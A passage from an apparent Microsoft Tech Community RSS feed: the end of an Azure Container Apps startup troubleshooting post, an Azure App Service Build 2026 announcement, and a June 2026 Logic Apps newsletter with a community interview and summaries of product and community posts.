&lt;LI-CODE lang="kusto"&gt;ContainerAppConsoleLogs_CL
| where ContainerAppName_s == "my-processing-job"
| where TimeGenerated &amp;gt; ago(24h)
| project TimeGenerated, Log_s, ContainerName_s
| order by TimeGenerated desc&lt;/LI-CODE&gt;
&lt;H3&gt;Summary: Your Startup Troubleshooting Checklist&lt;/H3&gt;
&lt;P&gt;Before you dig into complex diagnostics, run through this checklist whenever a Container App or Job fails to start:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Are all required environment variables and secrets defined and correctly referenced?&lt;/LI&gt;
&lt;LI&gt;Is the application listening on `0.0.0.0` and on the port that matches the ingress target port?&lt;/LI&gt;
&lt;LI&gt;Does the Dockerfile copy everything needed for the app to run (migrations, static files, etc.)?&lt;/LI&gt;
&lt;LI&gt;Are health probes configured with enough initial delay for the app to start?&lt;/LI&gt;
&lt;LI&gt;For jobs: is the replica timeout long enough, and does the process exit with code 0 on success?&lt;/LI&gt;
&lt;LI&gt;Is the container registry accessible from the Container Apps environment (managed identity or registry credentials configured)?&lt;/LI&gt;
&lt;LI&gt;Are the resource allocations (CPU and memory) sufficient for the application to start without OOM-killing?&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;References and Sample Resources&lt;/H3&gt;
&lt;P&gt;Use these resources for deeper implementation details and production-ready patterns.&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Azure Container Apps docs (core)&lt;/STRONG&gt;&lt;/H6&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/overview" target="_blank"&gt;Azure Container Apps overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/manage-secrets" target="_blank"&gt;Manage secrets in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/environment-variables" target="_blank"&gt;Manage environment variables in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/health-probes" target="_blank"&gt;Health probes in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/ingress-overview" target="_blank"&gt;Ingress in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/log-streaming" target="_blank"&gt;View logs in Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/jobs" target="_blank"&gt;Azure Container Apps Jobs overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/container-apps/revisions" target="_blank"&gt;Azure Container Apps revisions&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H6&gt;&lt;STRONG&gt;.NET and Django references&lt;/STRONG&gt;&lt;/H6&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/aspnet/core/fundamentals/configuration" target="_blank"&gt;ASP.NET Core configuration fundamentals&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/aspnet/core/host-and-deploy/health-checks" target="_blank"&gt;ASP.NET Core health checks&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://docs.djangoproject.com/en/stable/howto/deployment/checklist/" target="_blank"&gt;Django deployment checklist&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://docs.gunicorn.org/en/stable/settings.html" target="_blank"&gt;Gunicorn settings&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H6&gt;&lt;STRONG&gt;Sample repositories&lt;/STRONG&gt;&lt;/H6&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure-Samples/containerapps-albumapi-csharp" target="_blank"&gt;Azure Samples: .NET on Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure-Samples/containerapps-albumapi-python" target="_blank"&gt;Azure Samples: Python on Azure Container Apps&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure-Samples/mcp-container-ts" target="_blank"&gt;Azure Samples: TypeScript MCP container sample&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;What's Next&lt;/H3&gt;
&lt;P&gt;In Part 2 of this series, we move past startup failures and look at what happens after your app is running — the frustrating world of cold starts, scaling delays, and startup latency spikes that make your application feel slow under real production traffic.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Part of the series: Troubleshooting Azure Container Apps in Production&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Next: Part 2 — From Slow to Snappy: Performance Tuning Cold Starts and Scaling Delays in Azure Container Apps&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 07:58:44 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-developer-community/troubleshooting-azure-container-apps-and-jobs-for-net-and-django/ba-p/4518303</guid>
      <dc:creator>BhaktiRath95</dc:creator>
      <dc:date>2026-06-09T07:58:44Z</dc:date>
    </item>
    <item>
      <title>What's new in Azure App Service at #MSBuild 2026</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/what-s-new-in-azure-app-service-at-msbuild-2026/ba-p/4526569</link>
      <description>&lt;P&gt;At Microsoft Build 2026, Azure App Service introduced a powerful set of updates designed to help organizations accelerate their journey into AI, without increasing complexity or cost. These innovations focus on one clear business outcome: enabling teams to build, deploy, and scale AI-powered applications and agents faster, more securely, and with greater operational efficiency.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;DIV class="lia-embeded-content" contenteditable="false"&gt;&lt;IFRAME src="https://www.youtube.com/embed/wtUD8IV7rdA?si=Ocp33e23ec6gNXXJ" width="560" height="315" title="YouTube video player" allowfullscreen="allowfullscreen" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" frameborder="0" sandbox="allow-scripts allow-same-origin allow-forms"&gt;&lt;/IFRAME&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;A key highlight is the new &lt;A class="lia-external-url" href="https://aka.ms/Build26/AppService-BuiltInMCP" target="_blank"&gt;&lt;STRONG&gt;Easy AI experience&lt;/STRONG&gt;&lt;/A&gt;, which allows existing web apps to become AI-ready with no rearchitecting required. With capabilities like built-in Model Context Protocol (MCP), developers can instantly expose app functionality as agent-ready endpoints, enabling AI agents to interact with business logic securely and seamlessly. This dramatically reduces development time, allowing teams to move from idea to intelligent application in a fraction of the usual effort.&lt;/P&gt;
&lt;P&gt;Security and compliance are also strengthened with the general availability of &lt;STRONG&gt;&lt;A class="lia-external-url" href="https://aka.ms/AppService/Iv4docs" target="_blank"&gt;Isolated v4&lt;/A&gt; for Azure App Service Environments&lt;/STRONG&gt;, delivering improved performance for customers that need single-tenant isolation and strong data residency guarantees. For enterprises operating in regulated industries, this ensures AI applications meet strict governance requirements without sacrificing scalability or speed.&lt;/P&gt;
&lt;P&gt;For modernization scenarios, &lt;STRONG&gt;Managed Instance on Azure App Service&lt;/STRONG&gt; simplifies the migration of legacy applications, including those with OS-level dependencies. Faster restarts, enhanced diagnostics, and AI-assisted migration workflows help organizations modernize existing systems cost-effectively—avoiding expensive rewrites while unlocking AI capabilities. Recent updates include an AI-assisted approach to migrating legacy IIS applications using a &lt;A class="lia-external-url" href="https://aka.ms/Build26/AgenticIISMigration" target="_blank"&gt;multi-agent workflow&lt;/A&gt; powered by MCP. Managed Instance is supported on both Premium v4 and Isolated v4, laying the foundation for a modern compute infrastructure across the board.&amp;nbsp;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Operational efficiency is further enhanced through &lt;STRONG&gt;platform and CLI improvements&lt;/STRONG&gt; designed for the “agent era.” From structured deployment diagnostics to optimized Python pipelines delivering faster deployments, these updates reduce friction and infrastructure overhead, lowering total cost of ownership.&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Together, these innovations position Azure App Service as a future-ready platform where businesses can rapidly build intelligent, agent-driven applications securely, efficiently, and at scale.&lt;/P&gt;
&lt;P&gt;👉 Learn more in the full announcement: &lt;A class="lia-external-url" href="https://aka.ms/Build26/blog/AppService" target="_blank"&gt;Deep dive into Azure App Service Build 2026 updates&lt;/A&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 22:30:40 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/what-s-new-in-azure-app-service-at-msbuild-2026/ba-p/4526569</guid>
      <dc:creator>Mayunk_Jain</dc:creator>
      <dc:date>2026-06-08T22:30:40Z</dc:date>
    </item>
    <item>
      <title>Logic Apps Aviators Newsletter - June 2026</title>
      <link>https://techcommunity.microsoft.com/t5/azure-integration-services-blog/logic-apps-aviators-newsletter-june-2026/ba-p/4526525</link>
      <description>&lt;P&gt;&lt;STRONG&gt;In this issue:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="#community--1-aceaviator" target="_blank" rel="noopener"&gt;Ace Aviator of the Month&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="#community--1-productnews" target="_blank" rel="noopener"&gt;News from our product group&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="#community--1-communitynews" target="_blank" rel="noopener"&gt;News from our community&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;HR /&gt;
&lt;H1 id="aceaviator"&gt;Ace Aviator of the Month&lt;/H1&gt;
&lt;P&gt;&lt;STRONG&gt;June 2026's Ace Aviator:&amp;nbsp;Florian De Langhe&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;LinkedIn: &lt;A href="https://www.linkedin.com/in/floriandelanghe/" target="_blank" rel="noopener nofollow noreferrer"&gt;https://www.linkedin.com/in/floriandelanghe/&lt;/A&gt;&lt;/P&gt;
&lt;img&gt;Florian De Langhe Lead Expert/Team Lead - Microsoft Integration @ delaware&lt;/img&gt;
&lt;H5&gt;What's your role and title? What are your responsibilities?&lt;/H5&gt;
&lt;P&gt;Lead Expert/Team Lead for the Microsoft Integration team at delaware.&lt;BR /&gt;I have a wide range of responsibilities:&lt;BR /&gt;- People management&lt;BR /&gt;- Resource planning&lt;BR /&gt;- Design and operate our integration solutions at our customers, what we brand as "SmartLink".&lt;BR /&gt;&lt;BR /&gt;Next to this, as many of us, I follow the latest AI news closely to keep up to date and try to stay ahead of the curve.&lt;/P&gt;
&lt;H5&gt;Can you give us some insights into your day-to-day activities?&lt;/H5&gt;
&lt;P&gt;I wear many hats so no two days look the same. That is also what keeps it interesting.&lt;BR /&gt;&lt;BR /&gt;A typical day starts with reviewing resource planning across our active projects, followed by a technical design review for a new integration. Sprinkle some one-on-one coaching conversations and research into new technologies/features and you have my day.&lt;BR /&gt;&lt;BR /&gt;The balance between People leadership and hands-on technical work is what I enjoy most.&lt;/P&gt;
&lt;H5&gt;What motivates and inspires you to be an active member of the Aviators/Microsoft community?&lt;/H5&gt;
&lt;P&gt;I started out being an active member on the Microsoft Logic App forum 10 years ago. I remember going back and forth with Wagner through the forum posts trying to solve questions. Good times.&lt;BR /&gt;&lt;BR /&gt;Integration is one of those disciplines where you're constantly connecting systems, teams, and ideas. What motivates me is seeing how members of our community across different companies and countries solve similar problems in completely different ways. The Aviators community has that right mix of deep technical knowledge and willingness to help each other out. Since discovering Integration and the Microsoft community, I basically never left.&lt;/P&gt;
&lt;H5&gt;Looking back, what advice do you wish you had been given earlier?&lt;/H5&gt;
&lt;P&gt;Document everything and treat documentation as a deliverable, not an afterthought.&lt;BR /&gt;Early in my career I saw documentation as the boring part that you do after the development work.&lt;BR /&gt;Now I see it as the leverage point. A well-written design document doesn't just help the next person understand what you built, it compounds. It feeds code generation, easier onboarding of new members and validation with your customers on what and how to build it.&lt;/P&gt;
&lt;H5&gt;What has helped you grow professionally?&lt;/H5&gt;
&lt;P&gt;Two things:&lt;BR /&gt;1) Always challenge yourself and your implementations; everything can be better, so I am always pushing myself to keep learning, stay up to date, and think about every idea/solution posted in this community—how it could improve my way of thinking or solutions that I am building/have built.&lt;BR /&gt;2) Focus on understanding the integration concepts and patterns. At the end of the day everything is a pattern; it is how you implement where we make the difference. So knowing the base layer itself helps a lot when building integration solutions.&lt;/P&gt;
&lt;H5&gt;If you had a magic wand that could create a feature in Logic Apps, what would it be?&lt;/H5&gt;
&lt;P&gt;To be able to control scaling of the workflow service plans more fine grained. Being able to control this would unlock a lot of use cases, especially for the combination of Logic Apps and Service Bus concurrency and throughput.&lt;/P&gt;
&lt;HR /&gt;
&lt;H1 id="productnews"&gt;News from our product group&lt;/H1&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/write-logic-apps-in-c-introducing-the-logic-apps-standard-sdk/4524277" target="_blank" rel="noopener noreferrer"&gt;Write Logic Apps in C#: introducing the Logic Apps Standard SDK&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This article introduces the Logic Apps Standard SDK (Microsoft.Azure.Workflows.Sdk), a code-first way to define Logic Apps Standard workflows in C#. Developers compose workflows using a fluent builder with strongly typed triggers and actions, including both built-in and managed connector operations. The SDK preserves the existing runtime, connectors, monitoring, and run history while changing only the authoring experience. It supports control flow constructs, custom C# code steps, and run-after conditions for fault handling. Guidance covers getting started in VS Code, project layout, local F5 execution, and preview limitations such as no service provider connectors and work-in-progress managed identity support.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/new-ai-gateway-capabilities-in-azure-api-management/4524604" target="_blank" rel="noopener noreferrer"&gt;New AI gateway capabilities in Azure API Management&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure API Management expands its AI gateway with a Unified Model API (preview) that lets clients use a single OpenAI-style format across providers, plus model aliases and discovery. GA updates include support for Anthropic and Google Vertex AI and content safety for MCP and Agent-to-Agent (A2A) traffic. Token observability now tracks cached, reasoning, and thinking tokens in Application Insights. Foundry import adds Anthropic API operations. A2A APIs reach GA with richer diagnostics and availability in classic tiers. Together, these features standardize governance, security, and observability for multi-model, multi-protocol AI applications.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/%F0%9F%8E%89-automation-just-became-a-team-sport-meet-azure-logic-apps-automation-/4524555" target="_blank" rel="noopener noreferrer"&gt;🎉 Automation just became a team sport. Meet Azure Logic Apps Automation.&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure Logic Apps Automation (public preview) is a new SKU that delivers a managed, SaaS-like experience for building and running workflow automations. It keeps the enterprise-grade Logic Apps engine while simplifying onboarding, collaboration, and governance with projects and applications, flexible permissions, and policy inheritance. The experience is AI-native with natural language authoring, first-class agents, tools via MCP, and managed sandboxes. It introduces a modern designer, draft mode, live run history, JavaScript expressions, elastic scale to zero, and knowledge-as-a-service integration—aimed at helping teams prototype quickly and operate securely at scale.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/%F0%9F%93%A2-announcing-knowledge-as-a-service-for-azure-logic-apps/4524601" target="_blank" rel="noopener noreferrer"&gt;📢 Announcing Knowledge as a Service for Azure Logic Apps&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Knowledge as a Service (public preview) provides a managed knowledge layer for Logic Apps that turns documents into a ready-to-use knowledge base without building a custom RAG pipeline. The service handles ingestion (parsing, chunking, embeddings) and retrieval (query rewriting, semantic search, ranking) and integrates with agentic workflows in Logic Apps Standard and the Automation SKU. On Standard, teams bring their own vector store and models; on Automation, the platform hosts them on behalf of the user. It supports Entra authentication and focuses on secure, grounded responses for agents and workflows.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/better-together-build-agents-in-microsoft-foundry-automate-them-with-azure-logic/4524557" target="_blank" rel="noopener noreferrer"&gt;Better Together: Build Agents in Microsoft Foundry, Automate them with Azure Logic Apps&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This post outlines a combined stack for agentic applications: Microsoft Foundry for building and hosting agents, and Azure Logic Apps for invoking and orchestrating them. New capabilities let teams create or select Foundry agents directly from the Logic Apps designer, pair any trigger with an agent for autonomous execution, and expose 1,400+ Logic Apps connectors and entire workflows as agent tools. The approach enables agents to act across systems, handle long-running processes, and integrate with enterprise events, making deterministic workflows and AI-driven reasoning work together in production.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/whats-new-in-azure-api-management-at-microsoft-build-2026/4524683" target="_blank" rel="noopener noreferrer"&gt;What's new in Azure API Management at Microsoft Build 2026&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This roundup covers Build 2026 updates for API Management and API Center: GA for agent registration, assessment, and Git sync in API Center, plus a data plane MCP server for enterprise discovery. API Management adds GA support for JSON‑RPC agent‑to‑agent (A2A) APIs and extends content safety controls to MCP and A2A flows. Unified Model API enters preview to standardize client integration across model providers, and AI Gateway expands to Anthropic and Vertex AI with broader token metrics. Platform enhancements include multi‑domain and wildcard custom hostnames in v2 tiers and workspace support on the built‑in gateway.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/azure-connector-namespaces-managed-integration-for-any-azure-compute/4524250" target="_blank" rel="noopener noreferrer"&gt;Azure Connector Namespaces: managed integration for any Azure compute&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure Connector Namespace (preview) offers a fully managed integration layer that brings the Logic Apps connector ecosystem to any Azure or self‑hosted compute without requiring a workflow engine. Apps call strongly typed SDKs for C#, Node.js, or Python to invoke actions and subscribe to triggers, while the namespace handles auth, token rotation, retries, throttling, and webhook delivery. It also projects connectors as MCP servers for agents, and supports hosted MCP servers like Playwright and Azure SQL. The post details building blocks, scenarios, security, governance, and preview limitations.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/whats-new-in-azure-logic-apps-at-microsoft-build-2026/4524685" target="_blank" rel="noopener noreferrer"&gt;What's new in Azure Logic Apps at Microsoft Build 2026&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This Build 2026 overview highlights Logic Apps Automation (public preview), GA for the Logic Apps MCP Server to expose workflows as MCP tools, direct invocation of Microsoft Foundry agents from Logic Apps, Knowledge as a Service, and code‑first development with the Logic Apps Standard SDK (Codeful Workflows). It also introduces a Migration Agent to help modernize from legacy platforms. The theme is making enterprise‑grade automation more accessible while preserving governance, reliability, and operational controls for production use.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/hosted-mcp-servers-in-connector-namespace-preview/4524588" target="_blank" rel="noopener noreferrer"&gt;Hosted MCP Servers in Connector Namespace (Preview)&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Hosted MCP servers in Connector Namespace let teams deploy managed, enterprise‑ready MCP servers from a curated catalog in minutes. The platform handles deployment, scaling, authentication (inbound with Entra ID, outbound with managed identity or on‑behalf‑of), availability, and observability via Application Insights. Preview servers include Playwright for browser automation and Azure SQL via Data API Builder, enabling agents to use reliable tools without the overhead of self‑hosting. The post explains setup, benefits over self‑hosted servers, and areas of ongoing investment like catalog expansion and VNet support.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/mcp-test-console-and-git-repository-synch-in-azure-api-center/4524617" target="_blank" rel="noopener noreferrer"&gt;MCP Test Console and Git Repository synch in Azure API Center&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure API Center adds a built‑in MCP Test Console in the developer portal and Git repository synchronization for MCP servers and other assets. Developers can validate MCP tools interactively on the Documentation tab and browse server tiles with endpoints and schemas. Git sync keeps the API Center inventory aligned with source‑controlled definitions, with secure access via Key Vault and managed identity. Together, these additions streamline discovery, testing, and governance of MCP assets across the enterprise.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/bringing-all-your-integration-workloads-to-logic-apps-standard/4517262" target="_blank" rel="noopener noreferrer"&gt;Bringing all your Integration workloads to Logic Apps Standard&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;This post outlines Microsoft’s guided path for moving enterprise integration workloads—especially BizTalk—to Azure Logic Apps Standard. It introduces the open-source Logic Apps Migration Agent, which delivers an AI‑assisted, stage‑gated process across discovery, planning, baseline conversion, and continuous validation with human‑in‑the‑loop checkpoints. The workflow integrates with VS Code and GitHub Copilot, supports incremental “flow‑group” migration, and accommodates existing black‑box tests. The article also previews mission‑critical capabilities arriving for Standard and Hybrid (HL7, MLLP, Rules Engine, MSMQ, Oracle DB, flat‑file generation, Integration Accounts, and more), giving teams a repeatable, auditable modernization path with reduced risk.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/announcing-microsoft-host-integration-server-2028-modern-connectivity-for-ibm-ma/4517606" target="_blank" rel="noopener noreferrer"&gt;Announcing Microsoft Host Integration Server 2028: Modern connectivity for IBM Mainframes Midranges&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Host Integration Server 2028 (HIS 2028) is the next HIS release, delivered as a standalone SKU decoupled from BizTalk. It modernizes platform foundations (.NET 10) and, for non‑SNA features, introduces Linux support. New investments include Foundry integration for agent scenarios, REST APIs for DB2 and Transaction Integrator workloads, Entra ID and Azure Arc for hybrid management, a move to Visual Studio Code for designers, and alignment with newer IBM middleware. The post also lists product cleanup and deprecations (e.g., 32‑bit, WMI/WCF, BizTalk adapters), helping enterprises secure, govern, and operate host connectivity for years ahead.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/easy-auth-configuration-for-logic-app-standard-through-cicd/4520539" target="_blank" rel="noopener noreferrer"&gt;Easy Auth Configuration for Logic App Standard through CI/CD&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Enabling App Service Easy Auth on Logic Apps Standard can break run‑history views because SAS‑based runtime calls are blocked before the Logic Apps engine can validate them. This article explains two remedies: allow unauthenticated requests (so the runtime enforces its own auth), or keep Easy Auth strict and exclude runtime endpoints (e.g., /runtime/*) using authsettingsV2. It provides CI/CD‑ready approaches via ARM/Bicep templates or a post‑deployment REST API call, and highlights key settings such as requireAuthentication, unauthenticatedClientAction, excludedPaths, and allowedApplications. The guidance restores run‑history usability while maintaining enterprise authentication policies.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/run-javascript-code-on-agent-loop/4519880" target="_blank" rel="noopener noreferrer"&gt;Run Javascript code on Agent Loop&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Azure Logic Apps Agent Loop now supports a JavaScript code interpreter, extending earlier code‑execution support and enabling reliable computations, validations, and transformations alongside LLMs. The runtime executes generated or pre‑written code inside a V8 isolate using the isolated‑vm library, providing memory limits, timeouts, and failure isolation (not a full sandbox) to reduce blast radius. A worked example shows expense‑validation with agent tools orchestrated in a workflow. For Consumption, attaching an Integration Account provides isolated compute for the interpreter. The capability helps teams combine deterministic steps with agentic reasoning to deliver robust, auditable outcomes.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/bulk-configure-diagnostic-settings-on-azure-logic-apps-consumptions/4521454" target="_blank" rel="noopener noreferrer"&gt;Bulk-configure diagnostic settings on Azure Logic Apps Consumptions&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;LA‑BulkDiag is a single‑file PowerShell script that bulk‑applies diagnostic settings across Logic Apps Consumption in a resource group. It inventories workflows, supports quick scopes (bare/all/pick), verifies destinations, auto‑renames on name collisions, and ships with 129 Pester tests. Presets cover logs, metrics, and workflow‑runtime categories; selection grammar enables non‑interactive runs suitable for CI. The post includes quick‑start commands and clarifies scope: it targets Consumption only (not Standard) and doesn’t configure Event Hub sinks. The result is faster, consistent observability at scale without repetitive portal clicks or accidental overwrites.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/clean-up-idle-and-always-failing-azure-logic-app-consumption/4521728" target="_blank" rel="noopener noreferrer"&gt;Clean up idle and always-failing Azure Logic App Consumption&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;LA‑CleanUp is a PowerShell utility that scans a subscription for Logic Apps Consumption workflows, classifying them as Idle (no runs in N days) or AlwaysFailing (runs in the window with zero successes). It can export candidates to CSV, then guide per‑item deletion with y/N/q prompts, reporting final counts. Under the hood, it uses OData filters and $top=1 queries for fast server‑side checks, caches an ARM token once, and intentionally avoids cross‑subscription operations. Scope notes: it doesn’t touch Standard workflows or API connections. The tool reduces noise, costs, and operational drag from abandoned or broken apps.&lt;/P&gt;
&lt;HR /&gt;
&lt;H1 id="communitynews"&gt;News from our community&lt;/H1&gt;
&lt;H5&gt;&lt;A href="https://github.com/balbrench/cci-spec2integration" target="_blank" rel="noopener noreferrer"&gt;Spec2Integration&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://uk.linkedin.com/in/balbir-singh-b449352?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Balbir Singh&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Spec2Integration proposes a spec-driven approach to building Azure Integration Services solutions. The open-source toolkit guides teams from a product brief through specification, modeling, contracts, mapping, and architecture to a deployable implementation targeting Azure Logic Apps, Functions, and related services. It includes governance gates for idempotency, observability, retries, and PII handling, plus a VS Code extension that visualizes pipeline status and the integration representation. Templates and tooling support greenfield projects and BizTalk migrations. The result aims to standardize repeatable steps, reduce failure modes, and accelerate delivery while keeping architectural control outside individual workflows.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.linkedin.com/pulse/stateful-orchestration-azure-when-logic-apps-break-do-al-ghoniem-mba-xbbhc" target="_blank" rel="noopener noreferrer"&gt;Stateful Orchestration in Azure: When Logic Apps Break, and What to Do Instead&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://au.linkedin.com/in/alghoniem" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Al Ghoniem, MBA&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This article examines where stateful orchestration with Azure Logic Apps can fall short and how to design around those gaps. It differentiates execution state from business state and highlights common failure modes: long-running instances, retry-induced duplicates, partial completion across SAP/Oracle/APIs, lost correlation, and unowned DLQs. It then contrasts orchestration choices—stateful Logic Apps, Durable Functions, Service Bus–backed orchestration, and choreography—emphasizing idempotency, correlation, reconciliation, and compensation. The guidance steers architects toward a control and observability layer so production incidents can be traced, replayed, and recovered without relying on workflow run history alone.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.youtube.com/watch?v=zjRm58mFTqY" target="_blank" rel="noopener noreferrer"&gt;Logic Apps Announcements at Microsoft Build&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Video by &lt;A href="https://de.linkedin.com/in/sebastianmeyerit?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sebastian Meyer&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This video recaps Logic Apps announcements from Microsoft Build with insights from a member of the product team. It highlights newly introduced capabilities and shares resources for deeper dives. Viewers get a concise overview of what’s new, why it matters for integration practitioners, and where to learn more. The discussion points architects toward practical use cases and next steps, making it a useful primer for anyone assessing roadmap impacts on existing or upcoming Azure Integration Services projects.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.linkedin.com/pulse/logic-apps-standard-vs-consumption-which-plan-should-you-choose-azl8e?trk=public_post_feed-article-content" target="_blank" rel="noopener noreferrer"&gt;Logic Apps Standard vs. Consumption: Which Plan Should You Choose?&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://ae.linkedin.com/in/chiranjibghatak?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Chiranjib Ghatak&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;The article compares Logic Apps Standard and Consumption, explaining differences in hosting models, pricing, networking, and development experience. It outlines when to pick each plan, noting Standard’s single-tenant model, VNet/private endpoints, built-in connectors, and local DevOps workflow, versus Consumption’s pay-per-execution model and simplicity for sporadic or low-volume workloads. It also covers performance trade-offs, stateful vs. stateless options available in Standard, and typical enterprise scenarios where Standard provides predictable costs and better throughput.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://sahinozdemir.nl/azure-connector-namespaces-managed-connectors-beyond-logic-apps" target="_blank" rel="noopener noreferrer"&gt;Azure Connector Namespaces: Managed Connectors Beyond Logic Apps&lt;/A&gt;&lt;/H5&gt;
